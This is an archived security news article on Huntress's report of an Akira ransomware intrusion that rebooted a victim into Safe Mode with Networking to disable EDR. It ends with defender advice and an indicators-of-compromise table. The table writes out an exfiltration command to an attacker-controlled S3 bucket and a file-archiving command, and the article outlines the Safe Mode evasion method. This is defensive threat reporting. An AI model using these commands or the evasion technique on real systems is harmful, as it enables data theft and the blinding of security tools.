CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Aug 13, 2026

Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor

Cybersecurity News Archived Aug 13, 2026 ✓ Full text saved

Akira ransomware has added a new way to weaken Windows security before it tries to lock files. In a recent intrusion, an affiliate rebooted a compromised system into Safe Mode with Networking, leaving the device connected while most third-party protections stayed offline. The operation began with a credential-spraying attack against an exposed SonicWall SSL VPN […] The post Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor appeared first on Cyber Security News .

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeUncategorized Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor By Tushar Subhra Dutta August 13, 2026 Akira ransomware has added a new way to weaken Windows security before it tries to lock files. In a recent intrusion, an affiliate rebooted a compromised system into Safe Mode with Networking, leaving the device connected while most third-party protections stayed offline. The operation began with a credential-spraying attack against an exposed SonicWall SSL VPN that had no multi-factor authentication. A valid account opened the door, after which the intruder used remote desktop access, mapped the network, collected files, and prepared them for upload. This route echoes the risks described in recent SonicWall VPN exploitation cases. The attackers had already established a familiar, fast-moving playbook: entry through remote access infrastructure, rapid discovery of valuable systems, data theft, and then an encryption attempt within hours. Huntress said in a report shared with Cyber Security News (CSN) that it identified this as its first observed Akira case using Safe Mode to impair endpoint detection and response tools. The finding matters because the group was the most active ransomware operation the researchers tracked in 2025, and even a failed encryption attempt can leave stolen data available for extortion. Akira Ransomware Uses Windows Safe Mode After obtaining access on August 4, the operator reached the domain controller through Remote Desktop Protocol and ran commands to export details on every user and computer in Active Directory. The files gave the attacker account names, group memberships, system information and other useful data for moving through the network. The group then archived mapped shares with WinRAR and sent staged files to cloud storage. Attack chain (Source – Huntress) Before launching the encryptor, the intruder installed AnyDesk as a service for remote control and file transfer. They also changed the Safe Mode registry list so that AnyDesk could run after the reboot. At 06:29 UTC, a startup configuration change forced the computer into Safe Mode with Networking, a reduced Windows startup state that loads core services but keeps network access available. That choice stopped the Huntress agent and disabled Microsoft Defender real-time protection. It gave the attacker a temporary blind spot, while the specially enabled remote-access service preserved hands-on control. The method resembles EDR-killer attacks through SSLVPN, but this case relied on Windows startup behavior rather than a malicious driver. Safe Mode abuse is not new among ransomware groups, but its appearance in an Akira intrusion expands the ways defenders must think about endpoint coverage. Security teams should treat unexpected boot-configuration changes, Safe Mode boot events, and security services stopping together as a high-priority warning, especially after unusual VPN login activity. A failed encryptor still harms victims The Safe Mode move did not produce the result the affiliate expected. Akira’s payload started at 06:34 UTC, but the system soon logged virtual-memory errors, followed by PowerShell failures. Researchers concluded that the stripped-down Safe Mode environment appears to have left the ransomware process without enough available virtual memory, preventing encryption from taking hold. Defender later detected the file as Ransom:Win32/Akira.B!ibt, yet it could not quarantine it while the computer remained in Safe Mode. SonicWall log showing the spray (msg 33) resolving into a successful SSL VPN login (msg 1080) (Source – Huntress) The cleanup succeeded only after the attacker rebooted into normal Windows at 08:10 UTC, restoring real-time protection. That outcome was fortunate, not dependable: a machine with more memory or an adjusted payload could still encrypt data. The incident also shows why encryption is not the only danger. Credentials and file shares had already been taken, creating leverage for a double-extortion demand. Organizations should require MFA for every VPN account, restrict or temporarily disable exposed SSL VPN access during an active incident, rotate Active Directory and VPN credentials after compromise, and centralize VPN and Windows logs in a SIEM. Teams should alert on bursts of failed logins across several usernames, then correlate them with a successful login from the same source or network provider. They should also deploy endpoint coverage across every host, rather than only selected systems. These steps complement lessons from SonicWall firewall ransomware activity and help defenders spot an intrusion before data theft or encryption begins. Indicators of compromise (IoCs):- Type Indicator Description IPv4 address 72.23.77[.]35 External source IP for the successful SSL VPN login used for initial access Hostname WIN-DNCVG09TAT8 Attacker-controlled workgroup jump-host seen in RDP and logon events File paths C:\ProgramData\AdUsers.txt, C:\ProgramData\AdComp.txt Active Directory enumeration output Command WinRAR.exe a -ep1 -scul -r0 -iext -imon1 … Command used to archive file shares Command s5cmd cp --sp "<staging_path>" s3://<attacker-bucket>/ Command used for exfiltration to an attacker-controlled S3 bucket File and SHA-256 S5cmd.exe e2356c742c74cce5c6b6100162d0071a3f71e2fed2ed895c2011061a95b3299a S3 exfiltration tool detected as HackTool:Win32/SSCmd!dha File and SHA-256 akira.exe 414b9985f46714f44dd1bd63860d2a48dcfababcfe5c712a4b4f575378127a56 Akira ransomware payload AnyDesk Client ID 1778787240 Remote operator peer that transferred the payload Windows event indicators Kernel-Boot EID 27 SAFEBOOT:NETWORK Kernel-General EID 12 BootMode=2 Windows events indicating a Safe Mode with Networking boot Process and behavior msconfig.exe boot-configuration change → reboot Safe Mode boot behavior associated with defense impairment Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Stop new phishing & malware before they compromise your business. Integrate live intel from 15K SOCs around the world Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Cyber Security Guide Top 10 Malware Threats of the Week – AsyncRAT, Remcos, and Xworm Lead the Surge Three PhaaS Kits Targeting US Organizations to Steal M65 Logins by Bypassing MFA How Top SOCs Detect and Stop AI Phishing that Beats Email Gateways  Top 10 Phishing Kits Used by Hackers to Launch Cyberattacks (July 20-26, 2026) An SOC Story of Why Fast Answers Beat Perfect Answers in Cyber Incident Response  Latest Cyber News Adobe Critical Adobe Commerce Vulnerabilities Allows Hackers to Execute Arbitrary Code Cyber Security Cisco Firewall 0-Day Vulnerability Exploited in the Wild to Trigger DoS Condition Cyber Security Critical WordPress RCE Vulnerability Allows Authors to Execute Code via Malicious PNG File Cyber Security News Palo Alto Networks Patches 11 New Vulnerabilities Across PAN-OS, GlobalProtect, and Prisma Access Cyber Attack News New “City-Forum” Hackers Attacking Salesforce and ServiceNow Instances Worldwide Expert Talks Expert Talks From Reactive Forensics to Predictive Defence: Strengthening Cyber Resilience in Banking  Expert Talks Beyond the Lure: What the DoNot Campaign Reveals About Modern Cyber Espionage  Expert Talks Your Incident Response Plan Has a Dependency You Never Approved Expert Talks Security in the AI Era Starts with First Principles  Cyber Security News Planning Your AI Security – How will You Manage All Your Resources?
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Aug 13, 2026
    Archived
    Aug 13, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗